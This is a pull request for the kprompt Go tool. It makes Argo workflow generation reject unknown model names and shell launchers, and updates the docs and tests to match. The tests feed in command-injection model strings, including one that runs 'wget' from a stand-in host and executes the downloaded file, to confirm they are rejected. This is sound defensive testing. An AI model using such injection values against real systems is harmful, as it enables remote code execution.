### PR TITLE
feat: fail closed for unknown Argo workflow models

### DIFF
--- a/docs/tools.md
+++ b/docs/tools.md
@@ -40,6 +40,16 @@ kprompt tools --json
 kprompt tools --context staging
 ```
 
+## Argo Workflow model recipes
+
+Argo Workflow generation has built-in training recipes for `yolo`, `yolov8`,
+and `yolov11`. An unknown `params.model` is rejected instead of producing a
+placeholder workflow.
+
+For any other model, set an explicit `params.image` and use direct, safe argv in
+`params.command` / `params.args`. Shell launchers that evaluate command strings
+(for example, `/bin/sh -c` or `bash -lc`) are rejected.
+
 ## Closing gaps with setup
 
 ```bash

--- a/internal/tools/argo/generate.go
+++ b/internal/tools/argo/generate.go
@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"path"
 	"regexp"
+	"sort"
 	"strings"
 
 	"sigs.k8s.io/yaml"
@@ -50,7 +51,10 @@ var modelRecipes = map[string]modelRecipe{
 	},
 }
 
-var modelFromPrompt = regexp.MustCompile(`(?i)\b(yolo(?:v?\d+)?)\b`)
+var (
+	modelFromPrompt    = regexp.MustCompile(`(?i)\b(yolo(?:v?\d+)?)\b`)
+	supportedModelList = formatSupportedModels(modelRecipes)
+)
 
 // InferModelFromPrompt extracts a model name from natural language when params are missing.
 func InferModelFromPrompt(prompt string) string {
@@ -184,13 +188,22 @@ func resolveContainer(req WorkflowRequest) (image string, command, args []string
 		return image, command, args, gpu, nil
 	}
 	if req.Model != "" {
-		image = "alpine:3.20"
-		command = []string{"echo"}
-		args = []string{fmt.Sprintf("Training %s (placeholder)", req.Model)}
-		gpu = req.GPU
-		return image, command, args, gpu, nil
+		return "", nil, nil, false, fmt.Errorf(
+			"unsupported workflow model %q (supported models: %s); set params.image with safe params.command/params.args for a custom container",
+			req.Model,
+			supportedModelList,
+		)
 	}
 	return "", nil, nil, false, nil
+}
+
+func formatSupportedModels(recipes map[string]modelRecipe) string {
+	models := make([]string, 0, len(recipes))
+	for model := range recipes {
+		models = append(models, model)
+	}
+	sort.Strings(models)
+	return strings.Join(models, ", ")
 }
 
 // isShellLauncher reports whether command+args invoke a shell that evaluates a

--- a/internal/tools/argo/generate_test.go
+++ b/internal/tools/argo/generate_test.go
@@ -45,25 +45,54 @@ func TestGenerateWorkflowRequiresImageOrModel(t *testing.T) {
 	}
 }
 
-func TestGenerateWorkflowUnknownModelDoesNotUseShell(t *testing.T) {
-	manifest, _, err := GenerateWorkflow(WorkflowRequest{
+func TestGenerateWorkflowRejectsUnknownModel(t *testing.T) {
+	manifest, summary, err := GenerateWorkflow(WorkflowRequest{
 		Name:  "train-custom",
 		Model: "custom-model-1",
+	})
+	if err == nil {
+		t.Fatal("expected error")
+	}
+	for _, want := range []string{"unsupported workflow model", "custom-model-1", "supported models: yolo, yolov11, yolov8", "params.image"} {
+		if !strings.Contains(err.Error(), want) {
+			t.Fatalf("error missing %q: %v", want, err)
+		}
+	}
+	requireNoWorkflowOutput(t, manifest, summary)
+}
+
+func TestGenerateWorkflowAllowsExplicitImageWithSafeArgv(t *testing.T) {
+	manifest, summary, err := GenerateWorkflow(WorkflowRequest{
+		Name:    "train-custom",
+		Task:    "train",
+		Model:   "custom-model-1",
+		Image:   "registry.example.com/ml/trainer:v1",
+		Command: []string{"python"},
+		Args:    []string{"train.py", "--epochs=1"},
 	})
 	if err != nil {
 		t.Fatal(err)
 	}
-	if strings.Contains(manifest, "/bin/sh") || strings.Contains(manifest, " -c") {
-		t.Fatalf("manifest should avoid shell launcher:\n%s", manifest)
+	for _, want := range []string{
+		"image: registry.example.com/ml/trainer:v1",
+		"command:",
+		"- python",
+		"args:",
+		"- train.py",
+		"- --epochs=1",
+	} {
+		if !strings.Contains(manifest, want) {
+			t.Fatalf("manifest missing %q:\n%s", want, manifest)
+		}
 	}
-	if !strings.Contains(manifest, "command:") || !strings.Contains(manifest, "- echo") {
-		t.Fatalf("manifest=%s", manifest)
+	if !strings.Contains(summary, "image=registry.example.com/ml/trainer:v1") {
+		t.Fatalf("summary=%q", summary)
 	}
 }
 
-// TestGenerateWorkflowInjectionShapedModelIsArgvSafe covers acceptance criterion 2 of SEC-006:
-// injection-shaped model strings must be passed as literal argv args, never evaluated by a shell.
-func TestGenerateWorkflowInjectionShapedModelIsArgvSafe(t *testing.T) {
+// TestGenerateWorkflowRejectsInjectionShapedUnknownModel keeps the SEC-006
+// security bar while ensuring unknown models cannot produce placeholder jobs.
+func TestGenerateWorkflowRejectsInjectionShapedUnknownModel(t *testing.T) {
 	maliciousModels := []string{
 		"$(touch /tmp/pwn)",
 		"`id`",
@@ -71,20 +100,21 @@ func TestGenerateWorkflowInjectionShapedModelIsArgvSafe(t *testing.T) {
 		"model && wget http://bad.example.com/x -O /tmp/x && sh /tmp/x",
 	}
 	for _, model := range maliciousModels {
-		manifest, _, err := GenerateWorkflow(WorkflowRequest{
+		manifest, summary, err := GenerateWorkflow(WorkflowRequest{
 			Name:  "train-custom",
 			Model: model,
 		})
-		if err != nil {
-			t.Fatalf("model=%q: unexpected error: %v", model, err)
+		if err == nil || !strings.Contains(err.Error(), "unsupported workflow model") {
+			t.Fatalf("model=%q: err=%v", model, err)
 		}
-		// Must use echo (argv-safe), never sh/bash/shell launcher
-		if strings.Contains(manifest, "/bin/sh") || strings.Contains(manifest, "bash -c") {
-			t.Fatalf("model=%q: manifest uses shell launcher:\n%s", model, manifest)
-		}
-		if !strings.Contains(manifest, "- echo") {
-			t.Fatalf("model=%q: manifest missing expected echo command:\n%s", model, manifest)
-		}
+		requireNoWorkflowOutput(t, manifest, summary)
+	}
+}
+
+func requireNoWorkflowOutput(t *testing.T, manifest, summary string) {
+	t.Helper()
+	if manifest != "" || summary != "" {
+		t.Fatalf("manifest=%q summary=%q, want no generated output", manifest, summary)
 	}
 }
 


### PR DESCRIPTION
## Summary

- reject unknown Argo workflow models instead of generating an Alpine placeholder job
- allow custom models only with an explicit image and safe argv
- document supported YOLO recipes and add coverage for unknown models and custom images

## Testing

- go test ./internal/tools/argo -count=1
- go test -race ./internal/tools/argo -count=1
- go vet ./internal/tools/argo
- go test ./... -count=1
- go build ./cmd/kprompt

Closes #161